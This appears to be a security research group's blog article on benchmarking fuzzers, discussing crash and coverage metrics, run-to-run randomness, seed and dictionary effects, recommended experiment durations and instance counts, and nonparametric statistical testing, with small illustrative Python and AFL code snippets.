 Evaluating the performance of a fuzzer is a challenging task. Setting up the experiment properly and drawing useful conclusions can be very difficult. Unfortunately, even in academia, where experiments should adhere to scientific standards, researchers sometimes rush to conclusions in statistically incorrect ways, or fail to set up experiments in a way that the fuzzing community recommends.

 In this article, we provide some cautions and recommended experimental settings for evaluating the performance of fuzzers. These recommendations are based on our research and experience in performance evaluations.

Problems on Fuzzer Evaluation

 Before going over the general recommended experimental setup, we will first elaborate on some problems in the performance evaluation of fuzzers.

Ambiguity of Metrics

 The first challenge in evaluating the "performance" of a fuzzer is to establish an evaluation metric. While the aim of a fuzzer is typically to discover crashes (resulting from bugs or vulnerabilities), some people believe that the more crashes a fuzzer detects, the better its performance.

 However, consider the scenario where fuzzer A detects crashes p, q, and r, and fuzzer B detects crashes r and s. Can we conclude that fuzzer A is superior because it found one more crash than fuzzer B? In this case, we must also take into account the fact that fuzzer A could not find crash s (and similarly, fuzzer B could not find crashes p and q).

 Thus, a claim that fuzzer A is superior based on this outcome alone only makes sense if what we are evaluating is which fuzzer generally uncovers a larger number of crashes across a wide range of programs under test (PUTs), without regard to which particular crashes are found.

 Moreover, it is important to note that if we rely on the number of crashes as an evaluation metric, crash deduplication must be as precise as possible. Since a mutation-based fuzzer generates many similar inputs, it creates a large number of inputs that trigger crashes on the same bugs.

 Generally, the fuzzer itself lacks the ability to pinpoint the cause of the crash and can only provide a simple classification. As a result, the number of inputs that cause crashes is frequently not equivalent to the number of bugs/vulnerabilities found.

 Consider an example where fuzzer A discovers 100 inputs that cause crash r, while fuzzer B identifies only one input that causes crash r. In this case, we cannot merely conclude that there is a difference of 99 in the number of crashes detected. (See Figure 1)


Figure 1. More crashes found in Fuzzer A, but all inputs are causing the same bug


 

 Moreover, a more fundamental problem is the duration of the experiment. Even if you run fuzzers on real-world software for several days, in most cases, you will only discover a few dozen bugs or vulnerabilities. Consequently, there is usually no significant difference between multiple fuzzers. Especially, if none of the fuzzers can detect any crashes, there is nothing to evaluate.

 For that reason, code coverage (the amount of code blocks, etc. that could be reached during fuzzing) is often used as an alternative. It is widely believed (*) that there is a correlation between code coverage and the potential number of crashes that a fuzzer can find, but it is not proportional. Therefore, it is not appropriate to rely solely on code coverage to determine the expected number of crashes.

 While it is generally true that higher code coverage increases the likelihood of finding a crash, it is not always the case. For example, if fuzzer A and B have similar code coverage but neither has found a crash, it is controversial to assume that fuzzer A is more likely to find crashes just because its code coverage is slightly higher.

 As mentioned above, it is important to pay attention to the values corresponding to the "y-axis," such as the number of crashes and code coverage, but it is also important to pay attention to the values corresponding to the "x-axis." When we compare the performance of fuzzers, the graph is often plotted with the time elapsed on the x-axis and the code coverage on the y-axis. However, depending on the element of interest, it may be better to set the x-axis to the number of PUT executions and compare the code coverage according to the number of PUT executions (see Figure 2).

 

Figure 2. Example graph showing the number of PUT executions on the x-axis (From EcoFuzz)

For instance, let's assume that you have applied some optimization to a fuzzer and you want to measure its effects. If the optimization aims to improve the execution speed, you should evaluate it on a graph with time as the x-axis. This is because the "probability of reaching a new code block in one PUT execution" remains unchanged even if the execution speed increases. Therefore, there should be no difference in the graph with the number of executions on the x-axis. In other words, a way to check for bugs in the implemented optimization is to observe if there is any change in the graph with the number of executions on the x-axis.

On the other hand, if you expect that the optimization will change the "probability of reaching a new code block in one PUT execution" due to new mutation algorithms or other factors, a graph with the number of executions on the x-axis will provide a more accurate evaluation than a graph with time on the x-axis. 1

Another important note on code coverage is that the size of code coverage is not directly proportional to the number of times a new code block is found. When a new code block is discovered, it is often the case that other new code blocks are also found at the same time due to subsequent processing beyond that block.

So, even if a fuzzer discovers 10,000 code blocks, it is natural that the fuzzer's hit coverage increases only around 1,000 times. Therefore, it is important to consider the special characteristics of each fuzzer when evaluating their performance.

For example, two fuzzers cannot be evaluated solely on the basis of whether they hit coverage increases frequently or less often. Other factors such as the actual code coverage achieved and the complexity of the conditions leading to the discovered paths should also be considered.

 As shown in Figure 3, both fuzzer A and B have the same code coverage value. 2 However, the number of coverage increases (number of new branches found) and paths reached are different. If fuzzer A can only reach the leftmost path due to poor mutation performance, fuzzer B is considered superior.

 On the other hand, if the conditions for reaching the leftmost path are very complex and the rest of the paths are uninteresting procedures such as error handling, then fuzzer A is considered superior for finding the important path. Moreover, depending on the Control Flow Graph (CFG), the code coverage of fuzzer A may be larger or smaller than that of fuzzer B. Therefore, comparisons of code coverage must take into account the unique characteristics of each fuzzer.

Figure 3. Fuzzer A and B show the same code coverage while the paths found are different
 

Uncertainty of the Fuzzer

 While a fuzzer generates or mutates test cases, it draws random numbers to produce many different inputs. Since it relies on these random numbers, its behavior is subject to uncertainty. 3 Furthermore, the performance of the fuzzer will depend on how long it runs and the type of PUT. Let’s discuss the problems caused by such uncertainty.

 Figure 4 shows the results of some experiments from fuzzbench. The horizontal axis represents the elapsed time, and the vertical axis represents the code coverage (Code Region) at that point. The number of instances running each fuzzer is 14. The thick line with dots represents the average value of the code coverage, and the areas above and below show the 95% confidence interval.

Figure 4. Coverage of various fuzzers measured for 23 hours

 Based on the graph, we can conclude that aflplusplus_optimal achieves the largest code coverage with a high probability at the end of the 23-hour experiment, both in terms of the mean value and the confidence interval. However, if we had stopped the experiment at 12 hours, the mean value of aflplusplus_optimal would not even come close to that of afl.

 Since the increase in coverage is time series data and the trend of the increase is different for each fuzzer, it is impossible to determine whether the fuzzer that is considered the best at a given time will also be the best further down the road.

 Having a time series also presents other problems. As mentioned earlier, fuzzers behave randomly, so even if you fuzz the exact same PUT with the same settings, different sources of random numbers can produce very different results. As an example, refer to the graph from the following tweet discussing this issue.

Figure 5. Coverage of each of the 20 measurements on one instance

 This graph shows the change in coverage when the same fuzzer (aflfast) is run on the same machine 20 times, with time on the horizontal axis and coverage on the vertical axis.

 From the graph, it is evident that evaluating performance with a small number of instances is risky. Evaluating each fuzzer with only one instance is roughly equivalent to randomly selecting just one curve from the 20 curves in this graph and looking at it alone. The average behavior of the fuzzer expected from that one curve would be very different from the average behavior expected from all 20 of these curves.

 Let's compare the fuzzbench graph that shows only the mean and confidence interval (Figure 4) with the graph that shows the coverage of the actual 20 instances (Figure 5). Although there are differences in measurement time and PUT, the mean value and confidence interval tend to increase smoothly. On the other hand, the coverage of individual instances shows more staircase-like changes.

 This is because there are many periods when the fuzzer cannot find a new code block and becomes stuck. As a result, there are periods of time when code coverage does not change for a certain period, causing a plateau (flat area) on the graph. Unless all instances exit the plateau at about the same time, it is unlikely for data such as averages to be stair-stepped.

 Therefore, when looking at graphs that show only means and variances, it is sometimes important to keep in mind that the actual coverage of each instance may be a staircase of extremes.

Strong Dependence on Configurations

It is important to note that the performance of a fuzzer can (seemingly) change significantly with just one different experimental setting.

The setting that produces the most noticeable change is the PUT used. Figures 6.1 through 6.3 show the results for several PUTs in the fuzzbench experiment.

 

Figure 6.1. Coverage with freetype2-2017 as PUT


Figure 6.2. Coverage with bloaty_fuzz_target as PUT



Figure 6.3. Coverage with lcms-2017-03-21 as PUT


 These figures demonstrate that the fuzzers with the highest coverage in 23 hours differ from PUT to PUT.

 Moreover, the same PUT may elicit completely different fuzzer behavior depending on the software version and build. Specifically, the method of instrumentation4 may significantly impact the performance.

 The two settings that cause the greatest variation in fuzzing results are the initial seeds and the dictionary. To illustrate this point, let's compare a situation where there is no suitable initial seed for a PUT that parses PDF files with one where a single PDF file is provided as the initial seed.

 Without an initial seed PDF file, the fuzzer is unlikely to reach code blocks beyond the header checks unless it first discovers the header (and trailer) of the PDF file format. Likewise, without discovering the format of the objects and xref tables that make up a PDF file, it cannot test the routines that process these structures. It is easy to see that the probability of a fuzzer that only applies relatively simple random mutations discovering these formats by chance is very low. The toy example below illustrates this.
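
 To see why header validation alone can stall a purely mutation-based fuzzer, consider the deliberately simplified, hypothetical parser stub below (written here in Python; it does not come from any real PDF library). Unless an input begins with the exact magic bytes, none of the deeper code is reachable, and the chance that blind random mutation produces that prefix is vanishingly small.

import random

def toy_pdf_parser(data: bytes) -> int:
    """Hypothetical PUT: rejects anything without a PDF-like header."""
    if not data.startswith(b"%PDF-"):
        return 0  # early exit: deeper code blocks are never reached
    # ... object/xref parsing would happen here ...
    return 1

# A random 5-byte prefix matches "%PDF-" with probability 256**-5 (~9e-13),
# so blind mutation almost never gets past the header check without a seed
# or a dictionary entry.
hits = sum(toy_pdf_parser(bytes(random.randrange(256) for _ in range(16)))
           for _ in range(100_000))
print(f"inputs passing the header check: {hits} / 100000")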

 On the other hand, if a decent PDF file is given as a seed, there is no need to discover the object or xref structure by fuzzing, nor is there a risk of getting stuck in header validation. Additionally, PDF files may contain other embedded formats, such as JavaScript or a Color Profile. If we suppose that the less a fuzzer knows about the format, the harder it is to keep PUT execution error-free and find new code blocks, then giving a diverse set of initial seeds, including ones with other embedded formats, can be very beneficial.

 The same principle applies to dictionaries. Including keywords such as %PDF-1.6, %%EOF, /Parent, and xref in the dictionary increases the likelihood that the associated code blocks will be executed. If these keywords are not present, we can only hope that they will be produced by chance during random string generation.

 Therefore, even with the same fuzzer, differences in the prior knowledge given to it often lead to differences in performance and completely different results.

 In addition to initial seeds and dictionaries, there are other ways to provide a fuzzer with prior knowledge. One such way is to adjust hyperparameters. A fuzzer typically has many parameters, which are usually in the form of macros or other compile-time specifications. For example, the AFL family has a hyperparameter called MAX_FILE, which limits the file size generated by the fuzzer. By default, this value is set to 1 MB, which is large enough to generate files of varying sizes. However, if we know that "PUT only accepts input up to 100 bytes and discards any input larger than that," we can lower this parameter to 100. This will reduce the possibility of generating meaningless input and lead to more efficient fuzzing. Even a small change in a single parameter can significantly increase or decrease performance.

 We have explained that the performance of the same fuzzer can vary significantly depending on the presence or absence of prior knowledge. So, how does prior knowledge affect the performance of different fuzzers?

 To ensure a fair performance evaluation, it is important to maintain the same initial seeds or dictionaries for each fuzzer. By making the experimental conditions as uniform as possible, we can create a valid experimental setting. Whether we start with no initial seed or use 10,000 initial seeds, applying the same conditions to all fuzzers will produce a valid experiment.

 However, it is surprising that in some experimental settings the dominance relationship between fuzzers can be reversed. For example, consider two settings: one with no decent initial seeds, and another with decent enough initial seeds.

 In the first setting, where there are no decent initial seeds, fuzzers with relatively simple random mutations are likely to get stuck. In such a situation, only fuzzers using special algorithms, such as REDQUEEN and concolic fuzzers that have SMT solvers, can reach new code blocks and get out of the plateau.

 On the other hand, in a setting with decent initial seeds, even a fuzzer that uses only random mutation can often handle the case where a specific keyword must be generated to get out of a plateau. Not only may the initial seeds already contain the keyword, but cloning and splicing mutations that copy bytes from other seeds also increase the likelihood that a newly generated input will contain it.

 In other words, the presence of the initial seed has a certain dictionary-like effect. Therefore, special fuzzers may perform better in the first setting, while fuzzers with simple random mutations may perform better in the second setting.

 So what is the best experimental setting?

 As with the discussion on PUT selection, there is no single correct answer for seed selection. It is best to choose a setting that closely imitates the actual situation in which the fuzzer will be used.

 For instance, if the input format is a commonly used one, like a PDF file, there are already initial seeds and dictionaries publicly available that have been optimized over the years. Since these seeds are expected to be used by anyone, it is acceptable to use them for performance evaluation.

 On the other hand, if the fuzzer is expected to run in circumstances where prior knowledge is not available, it is reasonable to benchmark in a situation that does not provide prior knowledge. It is important to clearly indicate the purpose of the fuzzer being evaluated and the assumptions made when constructing the experimental setting.

 In addition, it is noteworthy that experimental settings are not limited to explicit parameters that can bring about changes. The following is a portion of the AFL code:

/* Let's keep things moving with slow binaries. */

  if (avg_us > 50000) havoc_div = 10;     /* 0-19 execs/sec   */
  else if (avg_us > 20000) havoc_div = 5; /* 20-49 execs/sec  */
  else if (avg_us > 10000) havoc_div = 2; /* 50-100 execs/sec */

.....

  stage_max   = (doing_det ? HAVOC_CYCLES_INIT : HAVOC_CYCLES) *
                  perf_score / havoc_div / 100;

.....

/* We essentially just do several thousand runs (depending on perf_score)
     where we take the input file and make random stacked tweaks. */

  for (stage_cur = 0; stage_cur < stage_max; stage_cur++) {

 This code determines how many times to mutate a single seed based on how many times the PUT can be executed per second. In other words, fuzzing the same PUT with the same fuzzer and the same experimental settings may still exhibit different behavior and produce different results depending on the machine used for the experiment, differences in CPU load, and many other factors. In principle, a pure fuzzing algorithm should behave consistently regardless of the machine it runs on, but such machine dependence is introduced by optimizations made for practicality. Therefore, it is important to keep not only the experimental setup but also the experimental environment as identical as possible.

Recommended Experimental Setup

 In light of the issues raised thus far, we will discuss some recommended experimental settings.

Set up a hypothesis

 As with all scientific experiments, it is advisable to avoid conducting experiments without a hypothesis. We should only conduct experiments after clearly defining what we want to demonstrate or confirm. In many cases, experiments without a hypothesis can lead to meaningless results or biases in observation, making it easy to focus on spurious correlations.

Make an evaluation metric

 To begin, you must decide which metric to use as the evaluation metric. This can be the number of crashes, code coverage, or some other metric.

 If you choose to use the number of crashes, we recommend using MAGMA as the evaluation dataset. Currently, MAGMA is widely recognized as a dataset that allows for complete deduplication of crashes found. If you are unable to use the MAGMA dataset for evaluating the number of crashes, it is necessary to provide a mechanism to deduplicate crashes with the highest possible accuracy. For instance, the deduplication algorithm implemented in the AFL family is very inaccurate and almost useless.

Choosing PUTs and configurations

 Unless you have a special motivation, such as debugging purposes, you should always prepare multiple PUTs for performance evaluation. In the author’s experience, it is advisable to use at least 3 PUTs when experimenting with a specific input format (i.e., when you have a hypothesis such as "I want to show that this fuzzer is good at fuzzing PDF viewer") and 6 or more when experimenting with any input format. Experimental results with fewer than 6 PUTs may appear to have some kind of tendency by chance, which is a weak argument for performance evaluation. The paper "On the Reliability of Coverage-Based Fuzzer Benchmarking [1]" states that we should prepare at least 10 programs.

 The PUT used for testing fuzzers should ideally be a large software program, such as a well-known open-source program used in the real world. Using a self-written or small program with only a few dozen or a few hundred lines of code is not recommended5. This is because fuzzers are generally intended to be practical.

 It is also important to select the PUT as randomly as possible to reduce selection bias and eliminate arbitrariness. If you want to impose conditions on the PUT, such as being a well-known OSS, it is recommended to first create a set of PUTs that meet the conditions and then randomly select some of them.

 After selecting the PUTs, you must adjust the configurations for each PUT, including the initial seeds, dictionary, and other available parameters. It is recommended that you carefully consider these configurations to obtain the most practical results possible. If possible, you can use AFL's preset dictionaries or choose an existing corpus that appears to be suitable initial seeds (e.g., https://github.com/mozilla/pdf.js/tree/master/test/pdfs).

Choosing the experimental environment and duration

 Before starting the experiment, you need to set up the experiment environment, determine the duration of the experiment, and decide on the number of machine instances. It is important to consider factors such as the number of PUTs, deadline, available funds, and computing resources. Although it is difficult to determine the ideal values, we will first explain the optimal conditions and then discuss where we can make concessions.

 To ensure accurate results, it is recommended that all machines used in the experiments be as identical as possible. For example, you can run all experiments on the same machine, or use the same type of instance in a cloud environment.

 Regarding the period of the experiment, as mentioned previously, there is a problem: we do not know whether the fuzzer that is considered the best at a given time will also be the best when more time elapses. In extreme cases, even if you run the fuzzer for a very long time, you cannot eliminate this concern.

 However, intuitively, the longer you run the fuzzer, the less likely it is that such a reversal will occur. In reference [1], based on empirical experiments, it is recommended to run the experiment for at least 12 hours, and usually for 24 hours or more.

 The number of instances will affect the statistical tests described in the next section, "Statistical Evaluation." Intuitively, one might think that having more instances would lead to a more accurate prediction of the average behavior of the fuzzer. Reference [1] recommends using at least 10 instances, but preferably 20 or more.

 Let's now calculate the time required for the experiment. To put it simply, the CPU time required for an experiment can be calculated as follows:

(Required CPU Time [h])
= (# of PUTs) x (# of Instances) x (Time of Experiment [h]) x (# of Fuzzers to Compare)

 If we were to adopt the numbers recommended in [1] for everything, then even with a single fuzzer we would need an extremely large amount of resources and time: 10 x 20 x 1 [day] = 200 [CPU-days]. Therefore, in many cases, we must make some concessions. A worked example of this calculation is shown below.
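
 As a quick sanity check of the formula above, here is a minimal Python sketch of the calculation, using the numbers recommended in [1] for a single fuzzer; nothing in it is new measurement data.

def required_cpu_hours(num_puts: int, num_instances: int,
                       hours_per_run: float, num_fuzzers: int) -> float:
    """CPU time needed for a benchmark, following the formula above."""
    return num_puts * num_instances * hours_per_run * num_fuzzers

# The setup recommended in [1], evaluated for a single fuzzer:
hours = required_cpu_hours(num_puts=10, num_instances=20,
                           hours_per_run=24, num_fuzzers=1)
print(hours, "CPU-hours =", hours / 24, "CPU-days")  # 4800 CPU-hours = 200.0 CPU-days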

 First, in the author’s opinion, the duration of the experiment should not be shorter than 24 hours, and when possible it should be extended beyond 24 hours. Some may think that it is nonsensical to set a limit on the time because the number of PUT executions in the same amount of time depends on the CPU's performance and the number of parallel instances. However, in our experience with a DGX machine, which has more powerful CPUs than typical consumer machines, the majority of instances continue to increase coverage even after 24 hours. Considering that the increased coverage sometimes revealed new tendencies, it is recommended to run for a minimum of 24 hours in any environment.

 It may be possible to save time by running multiple instances on a single machine. However, the following points should be noted:

  • Ensure that the machine is not overloaded.
    • Monitor the frequency of PUT executions per second and keep it at a reasonable level.
    • There is no standard for the exact frequency of PUT executions. For instance, you may use CPUs with performance similar to those used in standard benchmarks such as fuzzbench.
    • Usually, fuzzers have no problem running in parallel with up to as many instances as there are physical cores6. However, even running only one instance per physical core can sometimes result in low performance. In particular, when several hundred instances are set up on a machine with several hundred cores, some operations such as fork become very slow, to the point where the experiment becomes meaningless. The more processes you create, the heavier the OS overhead becomes; this is a limitation of the OS. Therefore, the number of instances should be determined with some margin.
     
  • Avoid running different (comparing) fuzzers at the same time.
    • This is to ensure that the load of fuzzer A does not have an adverse effect on fuzzer B.
    • In some unavoidable situations, where the measured data is not susceptible to such adverse effects and is not to be published in a paper (data for internal use, etc.), it is acceptable to run them at the same time. However, this should always be clearly stated.

 If you have limited computing resources, you may use multiple machines as long as all runs for a given PUT are performed on the same machine. For example, PUT X should always run on machine A while PUT Y always runs on machine B.

 In cases where you are not planning to submit a paper and reducing the number of PUTs is unavoidable, you may consider using less than 10 PUTs. However, as stated earlier, it is recommended to use at least 6 PUTs whenever possible. If you decide to use fewer PUTs, you must be very careful of confirmation bias.

Statistical Evaluation

 This is the most challenging part. Unfortunately, many papers fail to conduct statistically correct evaluations. Since fuzzing campaigns can be considered as random time series data, it is reasonable to compare them using statistical methods to determine whether they are effective or not. Ultimately, what is being discussed here is the general difficulty of doing statistical tests right, not just in the context of fuzzing. A detailed explanation of this point would require a solid mathematical background and would be beyond the scope of this article. Therefore, we will only describe some common mistakes often observed in this field.

  • Nonparametric tests must be used.
    • Intuitively, the randomness of a fuzzing campaign does not exhibit good properties such as following a normal distribution. Therefore, few assumptions should be made about the distribution. In other words, it is appropriate to use nonparametric methods.
    • Most papers follow this rule.
  • The significance level α should be strict enough, and the number of samples should be sufficient.
    • The significance level α serves as the threshold for the p-value. In simple terms, α is the maximum probability of concluding that a difference exists when in fact there is none (a Type I error).
    • The choice of α is up to the experimenter, so there are various de facto standards depending on the field. In the fuzzing community, p < 0.05 is common. In the author’s opinion, p < 0.01 should be used, but this is a personal preference and not a problem. However, it is never acceptable to decide α after looking at the results of the statistical tests. In recent years there also seems to be a trend, presumably among those who consider fixing α meaningless, of simply reporting the p-value without setting α.
    • Nonparametric tests make fewer assumptions than parametric tests and therefore typically require more information (i.e., a larger sample size). On the other hand, each fuzzing trial is very expensive and it is difficult to increase the number of instances, making it hard to obtain significant results. (This is why questionable practices such as adjusting thresholds after seeing the results occur.) For example, the outcome of a test may differ greatly between 10 and 20 instances.
  • The multiple testing problem should be properly addressed.
    • Unfortunately, not many papers handle this issue correctly7. Addressing it properly, including its effect on the required sample size, is difficult. As a result, the results in many papers end up looking ambiguous. A simple correction procedure is sketched after this list.
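
 As one concrete (and intentionally simple) way to address the multiple testing problem, the sketch below applies the Holm-Bonferroni step-down correction to a set of per-PUT p-values. The p-values are made up purely for illustration, and other correction procedures may of course be preferable.

def holm_bonferroni(p_values, alpha=0.05):
    """Holm-Bonferroni correction: returns True where the null hypothesis
    is rejected while keeping the family-wise error rate at alpha."""
    m = len(p_values)
    order = sorted(range(m), key=lambda i: p_values[i])
    reject = [False] * m
    for rank, idx in enumerate(order):
        # Compare the k-th smallest p-value against alpha / (m - k)
        if p_values[idx] <= alpha / (m - rank):
            reject[idx] = True
        else:
            break  # once one test fails, all larger p-values fail as well
    return reject

# Hypothetical per-PUT p-values from comparing fuzzer A against fuzzer B:
p_values = [0.001, 0.004, 0.020, 0.030, 0.250]
print(holm_bonferroni(p_values))  # [True, True, False, False, False]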

 The test commonly used in fuzzing research papers is the Mann-Whitney U test. However, this test can only determine whether two groups follow different distributions, or whether the rank sum of one group is significantly larger than that of the other. In general, it cannot determine whether the mean or median of one group is significantly higher than that of another group.

 Furthermore, for the comparisons typically made in fuzzing research, the Brunner-Munzel test is arguably more suitable and has higher statistical power than the Mann-Whitney U test. However, there seems to be no discussion of this within the fuzzing community, and the Mann-Whitney U test is becoming the de facto standard as papers recommending it continue to be cited. The sketch below shows how both tests can be applied.
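
 To make the comparison concrete, the following minimal sketch applies both tests to the final coverage of two fuzzers on a single PUT using SciPy. The scipy.stats functions are used as documented, but the coverage numbers are entirely made up for illustration.

from scipy.stats import mannwhitneyu, brunnermunzel

# Hypothetical final code coverage of 10 instances per fuzzer on one PUT
coverage_a = [10213, 10457, 10102, 11034, 10755, 10311, 10620, 10098, 10989, 10543]
coverage_b = [9870, 9934, 10215, 9801, 10087, 9956, 10133, 9745, 10021, 9912]

# Mann-Whitney U test: compares the rank sums of the two samples
u_stat, p_mwu = mannwhitneyu(coverage_a, coverage_b, alternative="two-sided")

# Brunner-Munzel test: does not assume equal variances between the groups
w_stat, p_bm = brunnermunzel(coverage_a, coverage_b, alternative="two-sided")

print(f"Mann-Whitney U : p = {p_mwu:.4f}")
print(f"Brunner-Munzel : p = {p_bm:.4f}")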

 Thus, there are many aspects to consider when comparing fuzzers for each PUT (range where statistical methods can be applied). Drawing conclusions across PUTs is even more challenging.

 Drawing a conclusion like "fuzzer A has these characteristics" is difficult because even if the same fuzzer is used, each PUT shows completely different tendencies and results. Additionally, the impact of PUT on the fuzzer's performance cannot be modeled by formulas or any other means. Furthermore, since only a few dozen PUTs are used in experiments, each with different characteristics, statistical methods cannot be applied.

 Therefore, experimenters must reach their own conclusions through methods that satisfy them. One example: “For each of 10 PUTs, rank the 8 fuzzers by code coverage in descending order, and count how many times each fuzzer appears in the top 3. The fuzzer with the highest count is then considered the best.” A minimal sketch of this counting procedure is shown below.
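
 The fuzzer names and coverage numbers in the following sketch are hypothetical, and only three PUTs are shown to keep the example short.

from collections import Counter

# coverage[put][fuzzer] = final code coverage (hypothetical values)
coverage = {
    "put1": {"fuzzA": 1200, "fuzzB": 1000, "fuzzC": 900, "fuzzD": 800},
    "put2": {"fuzzA": 700, "fuzzB": 950, "fuzzC": 850, "fuzzD": 600},
    "put3": {"fuzzA": 2000, "fuzzB": 1500, "fuzzC": 2100, "fuzzD": 1900},
}

TOP_K = 3
top_counts = Counter()
for put, results in coverage.items():
    ranking = sorted(results, key=results.get, reverse=True)  # descending coverage
    top_counts.update(ranking[:TOP_K])

# The fuzzer that appears most often in the top K is considered the best
for fuzzer, count in top_counts.most_common():
    print(f"{fuzzer}: in top {TOP_K} on {count} of {len(coverage)} PUTs")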

 As this shows, there is no complete consensus in the fuzzing community on statistical evaluation methods for experimental results. Depending on what one wants to determine from the results, it is necessary to carefully consider which statistical methods to use.

Conclusion

 This article explains some of the pitfalls that may occur when evaluating the performance of a fuzzer, as well as some notes on how to construct an experimental setup. When evaluating the performance of fuzzers, it is important to understand the characteristics of each fuzzer and set up an appropriate experiment according to the problem you want to investigate.

 We will continue to investigate the performance of various fuzzers and carry out research and development to incorporate them into fuzzuf.

 In the next article, we will cover the concept of patch analysis, which is important in the development of 1-day exploits, using Google Chrome's 1-day as an example.

References

[1] Marcel Böhme, Laszlo Szekeres, Jonathan Metzman. On the Reliability of Coverage-Based Fuzzer Benchmarking. 44th International Conference on Software Engineering (ICSE 2022) https://mboehme.github.io/paper/ICSE22.pdf

[2] Marcel Böhme, Danushka Liyanage, Valentin Wüstholz. Estimating residual risk in greybox fuzzing. Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2021) https://mboehme.github.io/paper/FSE21.pdf

 

1: Of course, with both graphs, you can also explain that the optimization has no negative effect on the execution speed.
2: Code coverage may vary depending on the instrumentation methods used (e.g., with dominator tree optimization), but we will simplify by ignoring these cases.
3: Although the seed for the pseudorandom generator can be fixed, the behavior and performance of fuzzers can still vary depending on the chosen seed values.
4: Adding code to the program so that information from the PUT, such as coverage measurements, is fed back to the fuzzer.
5: Unless there is a special reason such as working with small programs for pilot implementation.
6: Note that some fuzzer implementations bind to a CPU core.
7: Comparing Fuzzers on a Level Playing Field with FuzzBench is a good example of a paper that appropriately handles testing.